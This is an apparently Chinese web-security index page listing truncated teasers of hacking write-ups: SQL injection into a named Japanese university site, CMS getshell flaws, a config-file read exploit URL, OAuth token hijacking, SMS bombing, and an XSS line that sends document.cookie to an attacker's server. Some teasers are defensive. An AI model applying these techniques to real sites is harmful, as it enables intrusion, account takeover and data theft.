欢迎来到[自学php网] ①群 287460651

渗透日本神奈川大学站点 - 网站安全 - 自学php关注热度:79

信息探测：目标站点：http: icfcs xxxxx jp服务器IP：210 166 xxx 76（日本）环境平台：PHP 5 1 6服务器系统：Apache 2 2 3 (Red Hat)打开网站首页，随便的打开了一个链接，手工测试了下注入漏洞是否..[详情]

意大利网站后台POST注入记录 - 网站安全 - 自学关注热度:15

信息探测：目标站点：http: www sixxf it服务器IP：192 232 2xx 97（美国）环境平台：PHP服务器系统：Apache这次用网页探测这个站的信息不是很完整，直接奔主题吧，打开网站后台，在登录帐号..[详情]

phpcms前台和(后台低权限)getshell1 - 网站安全 - 自学关注热度:18

1、首先先说前台的吧，估计很多站都开始补了。是针对phpcms 2008的，二次攻击范畴，二次解析getshell。在upload_field php中br $upload_allowext = !empty($C[ 39;upload_allowext 39;]) ? $C[ 39;u..[详情]

xss如何加载远程js的一些tips - 网站安全 - 自学p关注热度:21

在早期 ， 对于xss我们是这样利用的scriptwindow open( http: xxx xxx cookie asp?msg= +document cookie) script将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话，由于字符串长..[详情]

大汉版通JCMS数据库配置文件读取 - 网站安全 - 自关注热度:58

由于读取xml文件时没有对传进的参数进行过滤，flowcode参数可控，配置文件地址WEB-INF config dbconfig xml，由于控制了文件后缀，只能读取xml文件EXP:http: www iswin org jcms workflow design readxml jsp..[详情]

JSONP安全防范解决方案新思路 - 网站安全 - 自学关注热度:44

jsonp安全性防范，分为以下几点：1、防止callback参数意外截断js代码，特殊字符单引号双引号，换行符均存在风险2、防止callback参数恶意添加标签（如script），造成XSS漏洞3、防止跨域请求..[详情]

ecshop漏洞分析 - 网站安全 - 自学php关注热度:18

昨天在wooyun上看了看 以前blue大牛发的ecshop的洞, 还有一些其他的不过有些没给出利用方法 自己来做个分析把。 新版本的应该都补了把。if (!get_magic_quotes_gpc()){ if (!empty($_GET))..[详情]

齐博CMS存储型XSS可getshell（组合利用） - 网站安全关注热度:24

齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还..[详情]

某XXX短信和电话轰炸 - 网站安全 - 自学php关注热度:44

某XXX短信验证码未做次数和安全校验漏洞，每请求一次便会自动发一封短信而且打一个电话。利用代码：%@ page language=java pageEncoding=UTF-8%%@ page isThreadSafe=false %%@ page import=..[详情]

fuzzing XSS filter - 网站安全 - 自学php关注热度:30

题记：这是09年自己写的总结文章，之后多年也不搞这个了，技术显然是过时了，但我觉得思路还是有用的，算抛砖引玉吧，各位见笑0x00 前言这是一篇学习总结，首先对几位未曾谋面也..[详情]

51CTO存在严重逻辑设计缺陷SHELL主站 - 网站安全关注热度:27

1 信息收集通过分析51cto com的网络结构，发现整体业务由多个分站构成，往往越多的系统会带来越多的安全问题，所以一个一个的摸索。~ linkphone cn 大面积使用PHPCMShttp: publish linkphone c..[详情]

phpcms v9 前台无限制GETSHELL（第一弹） - 网站安全关注热度:26

0x01:介绍PHPCMS V9（后面简称V9）采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP（面向对象）方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展，代码维护..[详情]

派代网主站设计缺陷可删除任意文章 - 网站安全关注热度:22

注册了2个号。在主站可以直接发文章。然后我抓了包http: www paidai com managetopic php?action=user_del_topicboardid=47topicid=202807posterid=669387这是直接get操作 删除文章的。然后另外一个号 发一..[详情]

绕过网易oauth认证的redirect_uri限制劫持帐号token关注热度:180

这里是通过网易帐号登录56网的授权页面:https: api t 163 com oauth2 authorize?client_id=II5coZy8DdAtKt7aredirect_uri=http%3A%2F%2Fapp 56 com%2Fcooperate%2Findex php%3Faction%3DWeibo%26tag%3Dwy%26do..[详情]

Citrix XenApp越权访问 - 网站安全 - 自学php关注热度:35

一、简介Citrix XenApptrade;是一种按需应用交付解决方案，能够在数据中心对所有Windows应用实现虚拟化、集中部署和管理，并能作为一项服务、通过任何设备向所有用户交付应用。全世界共..[详情]